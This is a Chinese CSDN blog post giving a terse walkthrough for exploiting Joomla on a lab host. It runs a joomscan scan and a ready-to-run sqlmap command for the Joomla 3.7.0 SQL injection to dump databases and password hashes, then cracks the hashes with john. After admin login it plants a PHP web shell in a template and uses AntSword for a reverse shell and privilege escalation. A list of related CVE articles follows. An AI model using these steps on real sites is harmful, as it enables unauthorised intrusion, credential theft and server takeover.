Joomla漏洞利用

最新推荐文章于 2024-02-22 18:39:43 发布
最新推荐文章于 2024-02-22 18:39:43 发布
阅读量703 收藏 2
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44635376/article/details/113521873
版权

这里写目录标题

漏洞扫描

joomscan -u http://192.168.1.24/

Joomla3.7.0有一个sql注入漏洞

//--dbs 可变参数部分,通过更改这个参数来获取数据库,表,用户密码
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Join hash文件

john 文件

登陆Joomla管理控制台以后的利用

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

http://192.168.1.24/templates/beez3/html/yjh.php就是文件地址

蚁剑链接,反弹shell

提权

地球上的星际旅客
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2023-23752:Joomla未授权访问漏洞复现
薛定谔嘚喵博客
09-01 1511
Joomla是一个免费的开源内容管理系统(CMS),允许用户构建网站和在线应用程序。它于 2005 年首次发布,此后成为最受欢迎的 CMS 平台之一,为全球数百万个网站提供支持。 在 Joomla! 4.0.0 到 4.2.7 中发现了一个问题。不正确地访问检查允许对 Web 服务终结点进行未经授权的访问。
【漏洞复现】Joomla未授权访问漏洞(CVE-2023-23752)
做自己喜欢的事,并将其发挥到极致!
05-05 1052
Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行。在 Joomla! 版本为4.0.0 到 4.2.7中发现了一个漏洞,由于对web 服务端点访问限制不当,可能导致未授权访问Rest API,造成敏感信息泄露(如数据库账号密码等)。远程攻击者可以绕过安全限制获得Web应用程序敏感信息。
Joomla-3.4.6远程代码执行漏洞利用与分析
Adminxe的博客
07-16 1366
0x01 Joomla简介 Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩充使用范围。目前最新版本3.9.11,Joomla!是一套自由的开源软件,使用GPL授权,任何人随时都能下载 Joomla! 并使用。 0x02 漏洞简介 在exploit-db(https://www.exploit-db.com/exploits/47465)发布了Joomla命令执行...
Joomla 3.7.0 (CVE-2017-8917) 漏洞测试
sun1296825481的博客
12-11 2950
Joomla 3.7.0 (CVE-2017-8917) 漏洞测试 本漏洞测试使用的是虚拟机Ubuntu 18.04 LTS 一、环境搭建 1、docker的安装 .更新apt包索引 sudo apt-get update .安装以下包以使apt可以通过HTTPS使用存储库(repository) sudo apt-get install -y apt-transport-http...
Joomla未授权访问漏洞|CVE-2023-23752复现及修复
szgyunyun的博客
03-16 2606
Joomla 4.0.0 至 4.2.7 版本中的 ApiRouter.php#parseApiRoute 在处理用户的 Get 请求时未对请求参数有效过滤,导致攻击者可向 Joomla 服务端点发送包含 public=true 参数的请求(如:/api/index.php/v1/config/application?本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
CVE-2016-8870(Joomla 提权类漏洞 )
Fly_鹏程万里
03-15 1363
前言      Joomla是一套全球知名的内容管理系统。Joomla是使用PHP语言加上MySQL数据库所开发的软件系统,可以在Linux、Windows、MacOSX等各种不同的平台上执行。目前是由OpenSourceMatters这个开放源码组织进行开发与支持。  漏洞编号 CVE-2016-8870 漏洞影响范围 joomal 3.4.4 ~3.6.3 漏洞分析 在存在漏洞的...
Joomla远程代码执行漏洞分析小白版(小宇特详解)
小宇的web博客
11-08 3935
Joomla远程代码执行漏洞分析小白版(小宇特详解) 今天看了一下2021陇原战役WP,在看web方向的时候,看到pop链,想了解一下,后来又看到了p师傅在15年的一篇文章,在这里记录一下。这里主要是和反序列化一起讲的。 这个漏洞是在反序列化session 这个漏洞是因为libraries/joomla/session/session.php的_validate函数,将ua和xff调用set方法设置到了session中(session.client.browser和session.client.forwar
joomla漏洞利用代码
12-29
joomla漏洞利用代码,影响版本joomla1.5-3.4.最开始检测到利用该漏洞实施入侵的是 Securi 安全团队
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
"Joomla漏洞利用.exe" 文件可能是用于测试系统是否存在CVE-2015-7857漏洞的工具。这类工具通常由安全研究人员或渗透测试人员使用,以评估网站的安全性。然而,恶意用户也可能滥用这类工具进行非法攻击。因此,对于...
Java反序列化漏洞利用工具(joomla
01-01
Joomla的某些版本存在Java反序列化漏洞,攻击者可以利用这个漏洞执行任意代码,获取服务器权限,甚至完全控制受影响的系统。 首先,我们要理解什么是Java反序列化。在Java编程中,序列化是将对象的状态转换为字节流...
joomscan:OWASP Joomla 漏洞扫描器项目
07-24
它不仅可以检测已知的攻击性漏洞,还能够检测到许多可被攻击者利用来破坏系统的错误配置和管理员级别的缺陷。 此外,OWASP JoomScan 提供了一个用户友好的界面,并以文本和 HTML 格式编译最终报告,以便于使用和...
joomla3.7.3full
07-14
6. **安全性**: 由于Joomla是一个开放源码的平台,定期更新至关重要,以防止安全漏洞被恶意利用。用户应该遵循最佳实践,如定期备份、使用强壮的管理员密码、安装安全扩展等。 7. **扩展和插件**: Joomla拥有丰富的...
Nagini靶机之HTTP3协议、SSRF漏洞(Gopher + Mysql)、Joomla漏洞、SSH公钥登录、浏览器密码还原等利用方法
qq_40898302的博客
05-10 602
在snape用户下查看home路径,发现hermoine用户的主目录下有一个bin文件,bin文件下的su_cp文件拥有s权限,su_cp是copy的功能,并有hermoine所属权限。将abc生成一个md5值的密码,将joomla数据库中,joomla_users表中的site_admin的password字段的值更新为abc的MD5值。在hermoine的家目录存在.mozilla文件夹,他是存放浏览器的信息的文件夹下面存在firefox浏览器,通过工具去查看浏览器的账户密码。
joomla代码审计漏洞-POST注入
qq_54735393的博客
03-07 166
利用Seay代码审计系统对joomla源代码审计,找到可疑漏洞注入点,进行注入。
Joomla未授权漏洞分析
一剑开天门!的博客
02-23 1481
Joomla未授权漏洞分析
joomla 反序列化漏洞利用
shatianyzg的博客
10-16 413
实战:反序列化漏洞(CVE-2015-8562)
Joomla未授权访问漏洞CVE-2023-23752
dahege666的博客
03-23 2992
漏洞复现
速修复!Joomla 漏洞可导致RCE攻击
最新发布
smellycat000的专栏
02-22 196
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Joomla 内容管理系统中存在5个漏洞,可被用于在易受攻击网站上执行任意代码。这些漏洞影响多个 Joomla 版本,已在 5.0.3和4.4.3 中修复。这些漏洞概述如下:CVE-2024-21722:当用户的MFA方法被修改后,MFA管理特性并未正确终止已有的用户会话。CVE-2024-21723:对URL的不当解析可导致开放重定向后果。CV...
Joomla权限绕过漏洞(CVE-2023-23752)vulhub漏洞复现
qq_53003652的博客
07-07 724
Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。可获取网站最重要的配置信息,包含数据库的账号与密码。即可看到joomla页面。可获取所有用户的信息。
joomla3.7.0漏洞
05-16
Joomla 3.7.0 版本存在一个漏洞,该漏洞可能允许攻击者在未经授权的情况下上传任意文件,包括恶意文件。该漏洞是由于在文件上传时未正确验证文件扩展名所致。攻击者可以通过上传一个带有.php扩展名的文件,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值